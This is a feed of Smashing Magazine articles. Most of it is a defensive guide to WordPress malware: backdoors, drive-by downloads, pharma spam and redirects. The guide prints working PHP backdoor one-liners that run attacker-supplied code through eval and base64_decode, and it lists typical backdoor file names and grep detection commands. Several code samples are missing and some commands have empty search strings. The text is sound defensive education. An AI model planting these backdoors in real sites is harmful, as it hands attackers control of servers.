    The solution to all of this is to adopt an iterative design process that involves fast rounds of small-scale usability tests. Jakob Nielsen has been preaching this for years now. And then along comes Eric Ries, who talks in the most natural way about pivoting companies, directions, customer segments and design. People don’t iterate, they pivot.

    Pivot: You want to defeat your opponent, but it is difficult to win instantly by launching a full-scale attack in one shot. The proper way would be to advance and attack step by step, always keeping one foot on the ground and ever ready to bounce back in case an attack is not successful.

    Customer Development And Fieldwork

    The term “customer development” was coined by Stanford University professor Steve Blank, one of the fathers of the lean startup movement. Customer development means developing your own understanding of who your customers are, what they are like and what their needs are. This is done through an approach guided by the mantra “Get out of the building.” This mantra urges entrepreneurs to interview potential customers, to observe them in their own environment and to try to make sense of it. What a revelation to our UX research ears, huh? We UX people have been getting out of the building for a living for decades now. We call it by different names: ethnography, fieldwork, generative research, exploratory research, discovery research, user research, design research. Phew!

    Customer Development
    Customer development: You want to trade with a country in the Far East. However, when you finally get to talking with the people of the country, you realize that they prefer to trade for your scientific equipment rather than your gold coins.

    The Bottom Line

    The lean startup movement, like the story of Einstein’s physics exam, talks about the same things that UX people have talked about for decades. The difference is that people are now listening. The lean startup movement, followed by the lean UX approach, did not reveal any new UX concepts. But lean startup thought leaders do a terrific job, and a great service to UX people who struggle to get buy-in for design thinking and UX research.

    The secret sauce of lean startup people is that they advocate for user experience research and design as one of the primary solutions to their business problems, and they do it using plain language. I highly encourage UX practitioners to closely monitor the developments and thought-leadership in the lean startup world to see how they can use what they learn in their own organizations, “lean” or not.

    Learn More About The Lean Startup Movement



    Illustrations by Calvin C. Chan (@calvincchan), UX designer, Hong Kong.


    © Tomer Sharon for Smashing Magazine, 2012.

  • Security: Common WordPress Malware Infections


    WordPress security is serious business. Exploits of vulnerabilities in WordPress’ architecture have led to mass compromises of servers through cross-site contamination. WordPress’ extensibility increases its vulnerability; plugins and themes house flawed logic, loopholes, Easter eggs, backdoors and a slew of other issues. Firing up your computer to find that you’re supporting a random cause or selling Viagra can be devastating.

    WordPress Security

    In WordPress’ core, all security issues are quickly addressed; the WordPress team is focused on strictly maintaining the integrity of the application. The same, however, cannot be said for all plugins and themes.

    The focus of this post is not to add to the overwhelming number of WordPress security or WordPress hardening posts that you see floating around the Web. Rather, we’ll provide more context about the things you need to protect yourself from. What hacks are WordPress users particularly vulnerable to? How do they get in? What do they do to a WordPress website? In this lengthy article, we’ll cover backdoors, drive-by downloads, pharma hack and malicious redirects. Please note that some anti-virus apps report this article as malware, probably because it contains examples of code that should be avoided. The article does not contain any malware itself, so any alert must be based on heuristic analysis.

    Over the past two years, Web malware has grown around 140%. At the same time, WordPress has exploded in popularity as a blogging platform and CMS, powering close to 17% of websites today. But that popularity comes at a price; it makes WordPress a target for Web-based malware. Why? Simple: its reach provides the opportunity for maximum impact. Sure, popularity is a good thing, but it also makes us WordPress users vulnerable.

    A Bit About Our Security Expert: Meet Tony

    Lacking the technical knowledge needed to go into great depth, I brought on board a co-author to help me out. Bringing the technical information is Tony Perez, Chief Operations and Financial Officer of Sucuri Security. Sucuri Security provides detection, alerting and remediation services to combat Web-based malware. In other words, it works on websites that have been compromised. This means that Tony has the background, statistics and, most importantly, knowledge to go really in depth on malware issues that affect WordPress users.

    I asked Tony how he got into Web security:


    “I think it goes back to 2009. I was managing and architecting large-scale enterprise solutions for Department of Defense (DoD) clients and traveling the world. In the process, there was a little thing called compliance with the Security Technical Implementation Guide (STIG), set forth by the Defense Information Systems Agency (DISA). I know, a mouthful, but it’s how we did things in the DoD; if it didn’t have an acronym, it didn’t belong.

    That being said, it wasn’t until I joined Dre and Daniel at Sucuri Security, in early 2011, that I really began to get what I consider to be any resemblance of InfoSec chops.”

    Armed with Tony’s technical knowledge, we’ll look at the main issues that affect WordPress users today. But before we get into details, let’s look at some of the reasons why WordPress users might be vulnerable.

    What Makes WordPress Vulnerable?

    Here’s the simple answer. Old versions of WordPress, along with theme and plugin vulnerabilities, multiplied by the CMS’ popularity, with the end user thrown into the mix, make for a vulnerable website.

    Let’s break that down.

    The first issue is outdated versions of WordPress. Whenever a new WordPress version is released, users get a nagging message, but plenty of users have gotten pretty good at ignoring the nag. Core vulnerabilities in themselves are rarely an issue. They do exist; proof can be found in the most recent 3.3.3 and 3.4.1 releases. WordPress’ core team has gotten pretty good at rolling out security patches quickly and efficiently, so the risk of exploitation is minimal, provided that WordPress users update their installation. This, unfortunately, is the crux of the problem: WordPress users ignore the message. And it’s not just inexperienced and casual WordPress users who aren’t updating. A recent high-profile hack was of the Reuters website, which was running version 3.1.1 instead of the current 3.4.1.

    Vulnerabilities in plugins and themes are another issue. The WordPress repository has 20,000 plugins and is growing. The plugins are of varying quality; some inevitably have security loopholes, while others are outdated. On top of that, consider all of the themes and plugins outside of the repository, including commercial products that are distributed for free on Warez websites and come packed with malware. Google is our favorite search engine, but it’s not so hot for finding quality WordPress themes.

    Then, there’s popularity. WordPress is popular, without a doubt. Around 700 million websites were recorded as using WordPress in May of this year. This popularity means that if a hacker can find a way into one WordPress website, they have potentially millions of websites for a playground. They don’t need to hack websites that use the current version of WordPress; they can scan for websites that use old insecure versions and hack those.

    Finally and most significantly, the biggest obstacle facing WordPress users is themselves. Tony in his own words:

    “For whatever reason, there is this perception among WordPress users that the hardest part of the job was paying someone to build the website, and that once it’s built, that’s it, it’s done, no further action required. Maybe that was the case seven years ago, but not today.

    WordPress’ ease of use is awesome, but I think it provides a false sense of assurances to end users and developers alike. I think, though, this perception is starting to change.”

    From Tony’s experience at Sucuri Security, the most common vulnerabilities to website exploits are:

    • Out of date software,
    • Poor credential management,
    • Poor system administration,
    • Soup-kitchen servers,
    • Lack of Web knowledge,
    • Corner-cutting.

    A bit of time and education are all it takes to remedy these issues and to keep your WordPress website secure. This means not just ensuring that you as a WordPress expert are educated, but ensuring that the clients you hand over websites to are as well.

    The Evolution Of Attacks

    As the Internet has evolved, the nature of hacking has evolved with it. Hacking started out as a very different animal. Back in the day, it was about showing your technical prowess by manipulating a website to do things beyond the webmaster’s intentions; this was often politically motivated. One day you’d wake up and find yourself supporting the opposition in Nigeria or Liberia. These days, hacking is all about money. The recent DNSChanger malware (i.e. the “Internet Doomsday” attack), for example, let hackers rake in close to $14 million before being stopped by the FBI and Estonian police last November.

    Another hacking technology that has emerged is the malnet. These distributed malware networks are used for everything, including identity theft, DDoS attacks, spam distribution, drive-by downloads, fake AV and so on. The hackers automate their attacks for maximum exposure.

    Automation through the use of bots is not their only mechanism. Today you also have malware automation: the use of tools to quickly generate a payload (i.e. the infection), allowing the attacker to focus strictly on gaining access to the environment. Once the hacker has access to the environment, they copy and paste in the auto-generated payload. One of the more prevalent automation tools is the Blackhole Exploit Kit. This and many other kits can be purchased online for a nominal fee. That fee buys sustainment services and keeps the kit updated with new tools for the latest vulnerabilities. It’s a true enterprise.

    Common WordPress Malware Issues

    Thousands of malware types and infections are active on the Internet; fortunately, not all apply to WordPress. For the rest of this post, we’ll look at four of the most common attacks on WordPress users:


    • Backdoors,
    • Drive-by downloads,
    • Pharma hack,
    • Malicious redirects.

    Backdoors

    A backdoor lets an attacker gain access to your environment via what you would consider to be abnormal methods — FTP, SFTP, WP-ADMIN, etc. Hackers can access your website using the command line or even using a Web-based GUI like this:

    backdoor gui screenshot
    A backdoor GUI.

    Backdoors are exceptionally dangerous. Left unchecked, the most dangerous can wreak havoc on your server. They are often responsible for cross-site contamination incidents — i.e. when websites infect other websites on the same server.

    How am I attacked?

    The attack often happens because of out-of-date software or security holes in code. A vulnerability well known to the WordPress community was found in the TimThumb script that was used for image resizing. This vulnerability made it possible for hackers to upload a payload that functioned as a backdoor.

    Here is an example of a scanner looking specifically for vulnerable versions of TimThumb:


    What does it look like?

    Like most infections, this one can be encoded, encrypted, concatenated or some combination thereof. However, it’s not always as simple as looking for encrypted code; there are several instances in which it looks like legitimate code. Here is an example:


    Another example:


    Below is a case where the content is hidden in the database and targets WordPress installations:

    return @eval(get_option('blogopt1'));

    And here is a very simple backdoor that allows any PHP request to execute:

    eval (base64_decode($_POST["php"]));
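    To see why that one-liner is so dangerous, note that whatever string an attacker POSTs in the php parameter gets decoded and executed as PHP on your server. A small shell sketch (the payload below is a harmless, made-up example) shows how executable code hides inside an innocuous-looking base64 string:

```shell
# An attacker-supplied value like this looks like gibberish in a POST body...
payload='cGhwaW5mbygpOw=='
# ...but decodes straight into executable PHP:
echo "$payload" | base64 -d    # prints: phpinfo();
```

    A real payload would, of course, be something far nastier than phpinfo(), and because the code arrives at runtime, nothing suspicious is stored in the file itself.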

    Here is an example of a messy backdoor specifically targeting the TimThumb vulnerability:


    Here is another backdoor that commonly affects WordPress installations, the Filesman:


    How can I tell whether I’m infected?

    Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

    • wtf.php
    • wphap.php
    • php5.php
    • data.php
    • 1.php
    • p.php

    In other cases, the code is embedded in a seemingly benign file. For instance, this was found in a theme’s index.php file, embedded in legitimate code:


    Backdoors are tricky. They constantly evolve, so there is no definitive way to say what you should look for.

    How do I prevent it?

    While backdoors are difficult to detect, preventing them is possible. For the hack to be effective, your website needs an entry point that is accessible to the hacker. You can close backdoors by doing the following:

    1. Prevent access.
      Make your environment difficult to access. Tony recommends a three-pronged approach to locking down wp-admin:

      • Block IPs,
      • Two-factor authentication,
      • Limited access by default.

      This will make it extremely difficult for anyone except you to access your website.

    2. Kill PHP execution.
      Often the weakest link in any WordPress chain is the /uploads/ directory. It is the only directory that needs to be writable in your installation. You can make it more secure by preventing anyone from executing PHP. It’s simple to do. Add the following to the .htaccess file at the root of the directory. If the file doesn’t exist, create it.
    <Files *.php>
    Order deny,allow
    Deny from all
    </Files>
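    Tying this back to step 1, a minimal sketch of the “block IPs, limited access by default” idea is an extra .htaccess file inside /wp-admin/. This assumes Apache 2.2-style directives, and 203.0.113.10 is a placeholder for your own address:

```apache
# Deny everyone by default, then whitelist only known addresses.
Order deny,allow
Deny from all
Allow from 203.0.113.10
```

    Two-factor authentication is not something .htaccess alone can provide; that part needs a plugin or an additional HTTP authentication layer on top.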

    How is it cleaned?

    Once you have found a backdoor, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. On his blog, Canton Becker provides some advice on ways to scour your server for backdoors. There is no silver bullet for backdoors, though, or for any infection — backdoors can be simple or complex. You can try doing some basic searches for eval and base64_decode, but if your code looks like what’s below, then knowing what to look for becomes more difficult:


    If you are familiar with the terminal, you could log into your website using SSH and try certain methods. The most obvious and easiest method is to look for this:

    # grep -ri "eval" [path]

    Or for this:

    # grep -ri "base64_decode" [path]

    The r makes the scan recursive through all files and directories, while the i makes it case-insensitive. This is important because you could find variations of eval: Eval, eVal, evAl, evaL or any other permutation. The last thing you want is for your scan to fall short because you were too specific.
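    A quick sketch against a scratch directory (the path and file name are made up for the demo) shows the -i flag earning its keep, since a camouflaged eVal still turns up:

```shell
mkdir -p /tmp/grep_demo
# A disguised call that a case-sensitive search for "eval" would miss:
printf '<?php eVal(base64_decode($_POST["x"])); ?>\n' > /tmp/grep_demo/footer.php
grep -ril "eval" /tmp/grep_demo    # prints: /tmp/grep_demo/footer.php
```

    The -l flag lists matching file names only, which keeps the output manageable when scanning a whole installation.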

    Look for recently modified files:

    find . -type f -ctime -1 | more

    The -type f option restricts the search to files, and -ctime -1 restricts it to files whose status changed within the last 24 hours. You can look back 48 or 72 hours by specifying -2 or -3, respectively.
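    As a sanity check of those flags, this scratch-directory sketch (hypothetical path) plants a file and confirms that it shows up when filtering with -ctime -1:

```shell
mkdir -p /tmp/find_demo
echo '<?php // freshly planted file' > /tmp/find_demo/p.php
# Only files whose status changed within the last day are listed:
find /tmp/find_demo -type f -ctime -1    # prints: /tmp/find_demo/p.php
```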

    Another option is to use the diff command. This enables you to detect the differences between files and directories. In this case, you would use it for directories. For it to be successful, though, you need to have clean copies of your installation and themes. So, this works only if you have a complete backup of your website.

    # diff -r /[path]/[directory] /[path]/[directory] | sort

    The -r option recurses through all directories, and the sort command orders the output to make it easier to read. The key here is to quickly identify the things that don’t belong so that you can run integrity checks. Anything that is in the live website’s directory but not in the backup directory warrants a second look.
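    A toy run (hypothetical paths, one planted file) makes the output concrete; anything reported as “Only in” the live directory deserves a second look:

```shell
mkdir -p /tmp/backup_site /tmp/live_site
# An identical, legitimate file in both copies:
echo '<?php get_header(); ?>' | tee /tmp/backup_site/index.php > /tmp/live_site/index.php
# A backdoor planted only on the live site:
echo '<?php eval($_POST["x"]); ?>' > /tmp/live_site/wtf.php
diff -r /tmp/backup_site /tmp/live_site | sort    # prints: Only in /tmp/live_site: wtf.php
```

    Files that exist in both copies but differ in content are shown line by line instead, which is exactly what you want when an attacker has appended code to a legitimate file.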

    Drive-By Downloads

    A drive-by download is the Web equivalent of a drive-by shooting. Technically, it is usually embedded on your website via some type of script injection, which could be associated with a link injection.

    The point of a drive-by download is often to download a payload onto your user’s local machine. One of the most common payloads informs users that their computer has been infected and that they need to install an anti-virus product, as shown here:

    How does the attack get in?

    There are a number of ways an attack can get in. The most common causes are:

    • Out-of-date software,
    • Compromised credentials (wp-admin, FTP),
    • SQL injection.

    What does it look like?

    Below are a number of examples of link injections that lead to some type of drive-by download attack:


    More recently, drive-by downloads and other malware have been functioning as conditional malware — designed with rules that have to be met before the infection presents itself. You can find more information about how conditional malware works in Sucuri’s blog post “Understanding Conditional Malware.”

    How can I tell whether I’m infected?

    You can use a scanner such as SiteCheck to see whether you are infected; scanners are pretty good at picking up link injections. Another recommendation is to sign up for Google Webmaster Tools and verify your website. In the event that Google is about to blacklist your website, it will email you beforehand, notifying you of the problem and giving you a chance to fix it. The free service could pay dividends if you’re looking to stay proactive.

    Outside of using a scanner, the difficulty in identifying an infection will depend on its complexity. When you look on the server, it will look something like this:


    The good news is that such an infection has to be somewhere where an external output is generated. The following files are common places where you’ll find link injections:

    • wp-blog-header.php (core file)
    • index.php (core file)
    • index.php (theme file)
    • functions.php (theme file)
    • header.php (theme file)
    • footer.php (theme file)

    About 6 times out of 10, the infection will be in one of those files. Also, your anti-virus software might detect a payload being dropped onto your computer when you visit your website — another good reason to run anti-virus software locally.

    Sucuri has also found link injections embedded in posts and pages (as opposed to an originating PHP file), as well as in text widgets. In such cases, scrub your database and users to ensure that none of your accounts have been compromised.

    How is it cleaned?

    Cleaning can be a challenge and will depend on your technical skill. You could use the terminal to find the issue.

    If you have access to your server via SSH, you’re in luck. If you don’t, you can always download locally. Here are the commands that will be of most use to you when traversing the terminal:

    • CURL
      Used to transfer data with a URL syntax.
    • FIND
      Search by file or directory name.
    • GREP
      Search for content in files.

    For example, to search all of your files for a particular section of the injection, try something like this:

    $ grep -r "" .

    Including the following characters is important:

    • "
      Maintains the integrity of the search. Using it is important when you’re searching for special characters because some characters have a different meaning in the terminal.
    • -r
      Means “recursive” and will traverse all directories and files.

    You can also refine your search by file type:

    $ grep --include "*.php" -r "" .

    The --include option restricts the search to a particular file type; in this instance, only PHP files are scanned.

    These are just a few tricks. Once you’ve located the infection, you have to ensure that you remove every instance of it. Leaving just one could lead to serious frustration in the future.

    Pharma Hack

    Pharma hack is one of the most prevalent infections around. It should not be confused with malware; it’s actually categorized as SPAM — “stupid pointless annoying messages.” If you’re found to be distributing SPAM, you run the risk of being flagged by Google with the following alert:

    This site may be compromised.

    This is what it will look like on Google’s search engine results page (SERP):

    How am I attacked?

    The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules. This is controlled via code on the server, such as the following:


    Some injections are intelligent enough to create their own nests within your server. The infection makes use of $_SERVER["HTTP_REFERER"], which redirects the user to an online store that is controlled by the attacker to generate revenue. Here is an example of such a monetized attack:


    Like most SPAM-type infections, pharma hack is largely about controlling traffic and making money. Money can be made through click-throughs and/or traffic. Very rarely does a pharma hack injection redirect a user to a malicious website that contains some additional infection, as with a drive-by download attempt.

    This is why it’s so difficult to detect. It’s not as simple as querying for “Cialis” or “Viagra,” although that’d be awesome. Most people would be surprised by the number of legitimate pharmaceutical companies that exist and publish ads on the Web. This adds to the challenge of detecting these infections.

    What does it look like?

    Pharma hack has evolved, which has made it more difficult to detect. In the past, SPAM injections would appear in your pages, where they were easy to find and, more importantly, remove.

    Today, however, pharma hack is quite different. It uses a series of backdoors, sprinkled with intelligence, to detect where traffic is coming from, and then it tells the infection how to respond. Again, it can behave as conditional malware. More and more, pharma hack reserves its payload for Google’s bots; the goal is to make it onto Google’s SERPs. This provides maximum exposure and the biggest monetary return for the hackers.

    Here’s an image of an old pharma hack injecting SPAM into a blog’s tags:

    screenshot of a blog's tags with pharma hack tags

    Another version of pharma hack was injected in such a way that when the user clicks on an apparently benign link (such as “Home,” “About” or “Contact”), it redirects the user to a completely different page. Somewhere like this:

    How do I tell whether I’m infected?

    Identifying an infection can be very tricky. In earlier permutations, identifying an infection was as easy as navigating your website, looking at your ads, links, posts and pages, and quickly determining whether you’ve been infected. Today, there are more advanced versions that are harder to find.

    The good news for diligent webmasters is that by enabling some type of auditing or file monitoring on your WordPress website, you’ll be able to see when new files have been added or when changes have been made. This is by far one of the most effective methods of detection.

    You could try using free scanners, such as SiteCheck. Unfortunately, many HTTP scanners, including Sucuri’s, struggle with the task because pharma hack is not technically malicious, so determining the validity of content can be difficult for a scanner.

    How is it cleaned?

    First, identify the infected files, and then remove them. You can use the commands we’ve outlined above, and you can make queries to your website via the terminal to quickly see whether you’re serving any pharma SPAM to your visitors.

    When combatting pharma hacks, one of the most useful commands is grep. For example, to search for any of the ads or pharma references being flagged, run this:

    # egrep -wr 'viagra|pharmacy' .

    By using egrep, we’re able to search for multiple words at the same time, which saves time in this instance.

    Or try something like this:

    # grep -r "" .

    This only works if the infection is not encoded, encrypted or concatenated.

    Another useful method is to access your website via different user agents and referrers. Here is an example of what one website looked like when using a Microsoft IE 6 referrer:

    Try Bots vs Browsers to check your website through a number of different browsers.

    Terminal users can also use CURL:

    # curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

    How do I prevent it?

    Preventing a pharma hack can be tricky. Sucuri has found that the hack regularly exploits vulnerable out-of-date software. However, your out-of-date WordPress installation is not necessarily the problem. Even if you are up to date, another outdated installation on the same server could be vulnerable to the infection. If the real payload resides elsewhere on your server, not within your website’s directory, then catching it can be exceptionally difficult.

    Here is an example of what you might be looking for if you can’t find the infection in your own installation:


    To prevent a pharma hack, you should do two things:

    1. Keep your software up to date,
    2. Steer clear of soup-kitchen servers.

    Malicious Redirects

    A malicious redirect sends a user to a malicious website. In 2010, 42,926 new malicious domains were detected. In 2011, this number grew to 55,294. And that just includes primary domains, not all of their subdomains.

    When a visitor is redirected to a website other than the main one, that other website may or may not contain a malicious payload. Suppose someone visits your website and is silently taken to a second domain controlled by the attacker, where the malicious payload sits in that website’s stats.php file. Or the destination could be a harmless website with just ads and no malicious payload.

    How am I attacked?

    As with many malware attacks, it comes down to access. The malicious redirect could be generated by a backdoor. The hacker would scan for a vulnerability, such as TimThumb or an old version of WordPress, and, upon finding one, upload a payload that functions as a backdoor.

    What does it look like?

    Detecting a redirect is not as complex as detecting some of the other infections. It is often found in your .htaccess file and looks something like this:


    Or like this:


    There may be instances where a redirect is encoded and resides in one of your PHP files. If so, it will usually be found in your header.php, footer.php or index.php file; it has also been known to reside in the root index.php file and in other core template files. It is not always encoded, but if it is, it will look something like this:


    How do I tell if I am infected?

    There are a few ways to check for infections. Here are some suggestions:

    • Use a free scanner, such as SiteCheck. They very rarely miss malicious redirects.
    • Test using Bots vs Browsers.
    • Listen to your users. You might not detect the redirect, but sometimes a user will alert you to it.

    If a user does detect a problem, ask them pertinent questions to help diagnose the problem:

    • What operating system are they using?
    • What browser(s) are they using, and which version(s)?

    The more information you get from them, the better you can replicate the issue and find a fix.

    How is it cleaned?

    Malicious redirects are one of the easiest infections to clean. Here’s a good starting point:

    1. Open your .htaccess file.
    2. Copy any rewrite rules that you have added yourself.
    3. Identify any malicious code, like the sample above, and remove it from the file. Scroll all the way to the bottom of .htaccess to make sure there aren’t any error directives pointing to the same infection.

    Be sure to also look for all .htaccess files on the server. Here is one quick way to see how many exist on your server:

    # find [path] -name .htaccess -type f | wc -l

    And this will tell you where exactly those files are:

    # find [path] -name .htaccess -type f | sort

    The infection is not always restricted there, though. Depending on the infection, you might also find the redirect encoded and embedded in a file such as index.php or header.php.

    Alarmingly, these infections can replicate across all of your .htaccess files. The backdoor responsible can also be used to create multiple .htaccess files across all of your directories, all carrying the same infection. Removing the infection can feel like an uphill struggle, and sometimes cleaning every file you can find is not enough; there are even cases where a file is created outside of the Web directory. The lesson: always look outside of your Web directory as well as within it.

    How do I prevent it?

    A quick and easy method is to change ownership of the file, or to reduce the file’s permissions so that only the owner has permission to modify it. However, if your root account is compromised, that won’t do you much good.

    The most important file to take care of is .htaccess. Check out the tutorial “Protect Your WordPress Site with .htaccess” for tips on doing that.


    There you have it: four prevalent attacks that cause havoc across many WordPress installations today. You might not feel better if you get hacked, but hopefully, with this bit of knowledge, you’ll feel more confident that the hack can be cleaned and that your website can be returned to you. Most importantly, if you take one thing away from this: always keep WordPress updated.

    Tony’s Top Ten Security Tips

    1. Get rid of generic accounts, and know who is accessing your environment.
    2. Harden your directories so that attackers can’t use them against you. Kill PHP execution.
    3. Keep a backup; you never know when you’ll need it.
    4. Connect securely to your server. SFTP and SSH are preferred.
    5. Avoid soup-kitchen servers. Segment between development, staging and production.
    6. Stay current with your software — all of it.
    7. Kill unnecessary credentials, including for FTP, wp-admin and SSH.
    8. You don’t need to write posts as an administrator, nor does everyone need to be an administrator.
    9. If you don’t know what you’re doing, leverage a managed WordPress hosting provider.
    10. IP filtering + Two-factor authentication + Strong credentials = Secure access

    Tony’s Most Useful Security Plugins

    • Sucuri Sitecheck Malware Scanner
      This plugin from Tony and the Sucuri crew enables full malware and blacklist scanning in your WordPress dashboard, and it includes a powerful Web application firewall (WAF).
    • Login Lock
      This enforces strong password policies, locks down log-ins, monitors log-ins, blocks hacker IPs and logs out idle users.
    • Two-Factor Authentication
      This plugin enables Duo’s two-factor authentication, using a service such as a phone callback or SMS message.
    • Theme-Check
      Test your theme to make sure it’s up to spec with theme review standards.
    • Plugin-Check
      Does what Theme-Check does but for plugins.



    © Siobhan McKeown for Smashing Magazine, 2012.

  • Designing Better JavaScript APIs


    At some point or another, you will find yourself writing JavaScript code that exceeds the couple of lines from a jQuery plugin. Your code will do a whole lot of things; it will (ideally) be used by many people who will approach your code differently. They have different needs, knowledge and expectations.

    This article covers the most important things that you will need to consider before and while writing your own utilities and libraries. We’ll focus on how to make your code accessible to other developers. A couple of topics will touch upon jQuery for demonstration purposes, yet this article is neither about jQuery nor about writing plugins for it.

    “The computer is a moron.”
    — Peter Drucker

    Don’t write code for morons; write for humans! Let’s dive into designing APIs that developers will love using.

    Time Spent On Creating Vs Time Spent On Using

    Fluent Interface

    The Fluent Interface is often referred to as Method Chaining (although that’s only half the truth). To beginners it looks like the jQuery style. While I believe the API style was a key ingredient in jQuery’s success, it wasn’t invented by jQuery — credit seems to go to Martin Fowler, who coined the term back in 2005, roughly a year before jQuery was released. Fowler only gave the thing a name, though — Fluent Interfaces have been around for much longer.

    Aside from major simplifications, jQuery offered to even out severe browser differences. It has always been the Fluent Interface that I have loved most about this extremely successful library. I have come to enjoy this particular API style so much that it became immediately apparent that I wanted this style for URI.js, as well. While tuning up the URI.js API, I constantly looked through the jQuery source to find the little tricks that would make my implementation as simple as possible. I found out that I was not alone in this endeavor. Lea Verou created chainvas — a tool to wrap regular getter/setter APIs into sweet fluent interfaces. Underscore’s _.chain() does something similar. In fact, most of the newer generation libraries support method chaining.

    Method Chaining

    The general idea of Method Chaining is to achieve code that is as fluently readable as possible and thus quicker to understand. With Method Chaining we can form code into sentence-like sequences, making code easy to read, while reducing noise in the process:

    // regular API calls to change some colors and add an event-listener
    var elem = document.getElementById("foobar");
    elem.style.background = "red";
    elem.style.color = "green";
    elem.addEventListener('click', function(event) {
      alert("hello world!");
    }, true);

    // (imaginary) method chaining API
    DOMHelper.getElementById("foobar")
      .setStyle("background", "red")
      .setStyle("color", "green")
      .addEvent("click", function(event) {
        alert("hello world");
      });
    Note how we didn’t have to assign the element’s reference to a variable and repeat that over and over again.
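    Under the hood, chaining boils down to every command returning the object it was called on. Here is a minimal sketch; the Elem type and its methods are made up for illustration, not part of any real library:

```javascript
// hypothetical element wrapper to illustrate how chaining is implemented
function Elem(name) {
  this.name = name;
  this.styles = {};
}

Elem.prototype.setStyle = function(property, value) {
  this.styles[property] = value;
  return this; // returning the instance is what enables the next call
};

// each call hands the instance back, so calls can be stacked
var box = new Elem("foobar")
  .setStyle("background", "red")
  .setStyle("color", "green");
```

    Because setStyle() returns the instance, each call can be tacked directly onto the previous one.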

    Command Query Separation

    Command and Query Separation (CQS) is a concept inherited from imperative programming. Functions that change the state (internal values) of an object are called commands; functions that retrieve values are called queries. In principle, queries return data and commands change the state — but neither does both. This concept is one of the foundations of the everyday getter and setter methods we see in most libraries today. Since Fluent Interfaces return a self-reference for chaining method calls, we’re already breaking the rule for commands, as they are not supposed to return anything. On top of this (easy to ignore) trait, we (deliberately) break with this concept to keep APIs as simple as possible. An excellent example of this practice is jQuery’s css() method:

    var $elem = jQuery("#foobar");
    // CQS - command
    $elem.setCss("background", "green");
    // CQS - query
    $elem.getCss("color") === "red";
    // non-CQS - command
    $elem.css("background", "green");
    // non-CQS - query
    $elem.css("color") === "red";

    As you can see, getter and setter methods are merged into a single method. The action to perform (namely, query or command) is decided by the number of arguments passed to the function, rather than by which function was called. This allows us to expose fewer methods and in turn type less to achieve the same goal.
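    The dispatch-by-argument-count idea can be sketched in a few lines. Box and its css() method here are hypothetical stand-ins, not jQuery’s actual implementation:

```javascript
// hypothetical object merging getter and setter into one css() method
function Box() {
  this.styles = {};
}

Box.prototype.css = function(name, value) {
  if (value === undefined) {
    return this.styles[name]; // one argument: query
  }
  this.styles[name] = value;  // two arguments: command
  return this;                // commands stay chainable
};

var box = new Box();
box.css("color", "red"); // command
box.css("color");        // query: "red"
```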

    It is not necessary to compress getters and setters into a single method in order to create a fluent interface — it boils down to personal preference. Your documentation should be very clear about the approach you’ve decided on. I will get into documenting APIs later, but at this point I would like to note that multiple function signatures may be harder to document.

    Going Fluent

    While method chaining already does most of the job for going fluent, you’re not off the hook yet. To illustrate the next step of fluent, we’re pretending to write a little library handling date intervals. An interval starts with a date and ends with a date. A date is not necessarily connected to an interval. So we come up with this simple constructor:

    // create new date interval
    var interval = new DateInterval(startDate, endDate);
    // get the calculated number of days the interval spans
    var days = interval.days();

    While this looks right at first glance, this example shows what’s wrong:

    var startDate = new Date(2012, 0, 1);
    var endDate = new Date(2012, 11, 31)
    var interval = new DateInterval(startDate, endDate);
    var days = interval.days(); // 365

    We’re writing out a whole bunch of variables and stuff we probably won’t need. A nice solution to the problem would be to add a function to the Date object in order to return an interval:

    // DateInterval creator for fluent invocation
    Date.prototype.until = function(end) {
      // if we weren't given a date, make one
      if (!(end instanceof Date)) {
        // create a date from the given arguments,
        // proxying the constructor to allow for any parameters
        // the Date constructor would've taken natively
        end = new (Function.prototype.bind.apply(
          Date, [null].concat(Array.prototype.slice.call(arguments, 0))
        ))();
      }
      return new DateInterval(this, end);
    };

    Now we can create that DateInterval in a fluent, easy to type-and-read fashion:

    var startDate = new Date(2012, 0, 1);
    var interval = startDate.until(2012, 11, 31);
    var days = interval.days(); // 365
    // condensed fluent interface call:
    var days = (new Date(2012, 0, 1))
      .until(2012, 11, 31) // returns DateInterval instance
      .days(); // 365

    As you can see in this last example, there are fewer variables to declare, less code to write, and the operation almost reads like an English sentence. With this example, you should realize that method chaining is only one part of a fluent interface, and as such, the terms are not synonymous. To provide fluency, you have to think about code streams — where are you coming from and where are you headed?

    This example illustrated fluidity by extending a native object with a custom function. This is as much a religion as using semicolons or not. In Extending built-in native objects. Evil or not? kangax explains the ups and downs of this approach. While everyone has their opinions about this, the one thing everybody agrees on is keeping things consistent. As an aside, even the followers of “Don’t pollute native objects with custom functions” would probably let the following, still somewhat fluid trick slide:

    String.prototype.foo = function() {
      return new Foo(this);
    };

    "I'm a native object".foo();

    With this approach your functions are still within your namespace, but made accessible through another object. Make sure your equivalent of .foo() is a non-generic term, something highly unlikely to collide with other APIs. Make sure you provide proper .valueOf() and .toString() methods to convert back to the original primitive types.
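    A minimal sketch of such conversion methods, assuming the hypothetical Foo wrapper from above:

```javascript
// hypothetical wrapper type returned by the .foo() accessor
function Foo(value) {
  this._value = String(value);
}

// convert back to the original primitive in value and string contexts
Foo.prototype.valueOf = function() {
  return this._value;
};
Foo.prototype.toString = function() {
  return this._value;
};

String.prototype.foo = function() {
  return new Foo(this);
};

// the wrapper now behaves like the primitive it wraps
var wrapped = "I'm a native object".foo();
wrapped + ""; // "I'm a native object" — valueOf() kicks in
```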


    Jake Archibald once had a slide defining Consistency. It simply read Not PHP. Do. Not. Ever. Find yourself naming functions like str_repeat(), strpos(), substr(). Also, don’t ever shuffle around the positions of arguments. If you declared find_in_array(haystack, needle) at some point, introducing findInString(needle, haystack) will invite an angry mob of zombies to rise from their graves to hunt you down and force you to write Delphi for the rest of your life!

    Naming Things

    “There are only two hard problems in computer science: cache invalidation and naming things.”
    — Phil Karlton

    I’ve been to numerous talks and sessions that tried to teach me the finer points of naming things. I haven’t left any of them without having heard the quote above, nor having learned how to actually name things. My advice boils down to this: keep it short but descriptive, and go with your gut. But most of all, keep it consistent.

    The DateInterval example above introduced a method called until(). We could have named that function interval(). The latter would have been closer to the returned value, while the former is more humanly readable. Find a line of wording you like and stick with it. Consistency is 90% of what matters. Choose one style and keep that style — even if you find yourself disliking it at some point in the future.

    Handling Arguments

    Good Intentions

